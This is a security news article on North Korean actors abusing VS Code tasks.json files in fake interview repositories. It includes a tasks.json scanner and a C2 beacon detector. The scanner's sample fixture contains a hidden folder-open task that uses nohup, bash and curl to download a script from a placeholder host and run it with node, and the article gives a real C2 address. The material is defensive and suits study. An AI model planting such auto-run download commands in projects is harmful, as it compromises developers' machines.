Cyber actors linked to North Korea continue to develop and expand their capacity to conduct attacks by weaponizing one of the world's most prevalent code editor platforms: Microsoft Visual Studio Code.
In the Contagious Interview campaign, the tradecraft has changed significantly over time, shifting from conventional social engineering to targeting the developer community through trusted development environments.
This approach represents an alarming escalation in how adversaries use legitimate software tooling to deliver complex malware to victims' systems.
The entire attack chain starts with developers inadvertently cloning malicious repositories disguised as recruitment tasks or technical interview assignments.
This attack appears to mark a change of tactic compared to previously documented ClickFix-based delivery. Unlike previous ClickFix attacks, which relied on dubious emails with links, this attack inserts malicious commands into configuration files used by Visual Studio Code.
In other words, when a victim opens a compromised repository with Visual Studio Code and grants permission to trust the repository (a routine step when working with code repositories), Visual Studio Code will automatically parse its tasks.json configuration file.
This file can carry embedded commands that allow arbitrary code to be executed on the system without the user's awareness.
An additional form of abuse in Task configuration files was detected by the analysts and researchers at Jamf in December, in which dictionary files contained heavily obfuscated JavaScript code.
This JavaScript code executes automatically behind the scenes when the malicious repository is opened. The security researchers also documented the advanced methods the attackers used to evade detection and analysis.
The Infection Mechanism and Execution Flow
The infection begins when a developer clones and opens a malicious repository hosted on either GitHub or GitLab.
For macOS operating systems, malware incorporates a background shell command using nohup bash and curl to execute a remote download of a JavaScript payload from Vercel infrastructure.
The payload is executed directly in the Node.js runtime, so the attack continues even after Visual Studio Code is closed.
This method of persistence is especially effective because the payload runs outside the editor's own process.
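The auto-run behaviour described above (a task that starts as soon as a trusted folder is opened, and that uses nohup, bash and curl to stage a remote script) can be triaged before trusting a repository. The following scanner is an added example written for this article, not code from the original report or from any project it mentions; it parses a repository's .vscode/tasks.json (VS Code accepts comments and trailing commas there, which plain json.loads rejects) and reports every task configured with "runOn": "folderOpen", together with the shell tokens it contains. The token list, the sample tasks.json and the placeholder URL are assumptions constructed for the example.

```python
"""Triage a cloned repository's .vscode/tasks.json for tasks VS Code would
start automatically on folder open. Heuristic, defensive review only."""
from __future__ import annotations

import json
import re
from pathlib import Path

# Assumed token list: shell tooling typical of staging a remote payload.
SUSPICIOUS_TOKENS = ("nohup", "curl", "wget", "node ", "bash -c", "base64", "eval")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas so that the
    JSON-with-comments VS Code accepts can be fed to json.loads."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escaped char verbatim
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):            # line comment
            j = text.find("\n", i); i = n if j == -1 else j
        elif text.startswith("/*", i):            # block comment
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2
        else:
            out.append(c); i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def task_command(task: dict) -> str:
    """Flatten a task's command and args into one string for matching."""
    return " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])


def find_auto_run_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that runs on folder open. Trusting the
    folder is what lets these run, so review them before trusting."""
    doc = json.loads(strip_jsonc(tasks_json))
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        findings.append({
            "label": task.get("label", "<unlabelled>"),
            "type": task.get("type"),
            "command": cmd,
            "hits": [t for t in SUSPICIOUS_TOKENS if t in cmd],
        })
    return findings


def scan_repo(repo_dir: Path) -> list[dict]:
    """Scan <repo>/.vscode/tasks.json if the file exists."""
    p = repo_dir / ".vscode" / "tasks.json"
    return find_auto_run_tasks(p.read_text()) if p.exists() else []


# Constructed sample: one benign build task and one folderOpen task that
# stages a remote script with nohup/bash/curl and runs it under node.
# The URL is a placeholder, not a real indicator.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json as VS Code accepts it: comments and trailing commas allowed
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "setup",
      "type": "shell",
      "command": "nohup bash -c \"curl -s https://example.invalid/p.js -o /tmp/p.js && node /tmp/p.js\" >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}'''

if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"[auto-run] {f['label']} ({f['type']}): {f['command']}  hits={f['hits']}")
```

Run it against a freshly cloned directory with `scan_repo(Path("path/to/clone"))` before clicking "Trust" in the Workspace Trust prompt. A task that is both auto-run and hidden ("presentation": {"reveal": "never"}) deserves the closest look, but any folderOpen task should be read in full, because the token list is only a hint and obfuscated commands will not match it.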
Once executed, the JavaScript code will establish a permanent connection back to a command and control server located at 87.236.177.93, beaconing every five seconds.
The malware collects system information such as the hostname, MAC addresses and operating system details, then transmits it to the attackers before awaiting further tasking.
The payload runs a continuous loop that waits for JavaScript commands from its C2 server and executes them, giving the operators arbitrary code execution on the host.
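A fixed five-second beacon to a single address, as described above, stands out in connection telemetry because its inter-connection gaps have almost no variance. The script below is an added example, not code from the article or from any tool it names: it groups constructed connection-log lines by source and destination, computes the gaps between successive connections, and reports flows whose gap jitter stays under a threshold. The log line format, the thresholds and the benign addresses in the sample are assumptions; the C2 address is the one reported above.

```python
"""Flag destinations contacted at a fixed, short interval (periodic
beaconing) from constructed connection-log lines."""
from collections import defaultdict
from datetime import datetime
import statistics

# Constructed sample: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port>".
# One flow beacons every 5 s; the others are ordinary one-off connections.
# One beacon line is deliberately out of order to show the sort step.
SAMPLE_LOG = """\
2024-12-04T10:00:00 10.0.0.5 -> 140.82.112.3:443
2024-12-04T10:00:00 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:05 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:10 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:12 10.0.0.5 -> 151.101.1.69:443
2024-12-04T10:00:15 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:20 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:30 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:25 10.0.0.5 -> 87.236.177.93:443
2024-12-04T10:00:41 10.0.0.5 -> 140.82.112.3:443
"""


def parse_line(line: str) -> tuple[datetime, str, str]:
    """Split one log line into (timestamp, source, destination)."""
    ts, rest = line.split(" ", 1)
    src, _arrow, dst = rest.split(" ", 2)
    return datetime.fromisoformat(ts), src, dst


def find_beacons(log_text: str, min_conns: int = 5, max_jitter_s: float = 1.0) -> list[dict]:
    """Return flows with at least min_conns connections whose inter-connection
    gaps vary by no more than max_jitter_s (population std dev). Short,
    regular periods with near-zero jitter are the beaconing signature."""
    by_flow: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst = parse_line(line)
            by_flow[(src, dst)].append(ts)

    findings = []
    for (src, dst), times in by_flow.items():
        if len(times) < min_conns:
            continue
        times.sort()                       # logs are not guaranteed ordered
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        jitter = statistics.pstdev(gaps)
        if jitter <= max_jitter_s:
            findings.append({"src": src, "dst": dst, "count": len(times),
                             "period_s": period, "jitter_s": jitter})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}: {f['count']} connections, "
              f"period {f['period_s']:.1f}s, jitter {f['jitter_s']:.2f}s")
```

On real telemetry, legitimate software also beacons on a schedule (update checks, telemetry, chat clients), so the output is a candidate list to join against known-good destinations and process names, not an alert by itself. Pairing a hit with a parent process of node launched from a VS Code task, as in the chain described above, is what turns it into one.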
Developers should also review repository contents before marking a repository as trusted, and inspect the layout of tasks.json for suspicious configurations.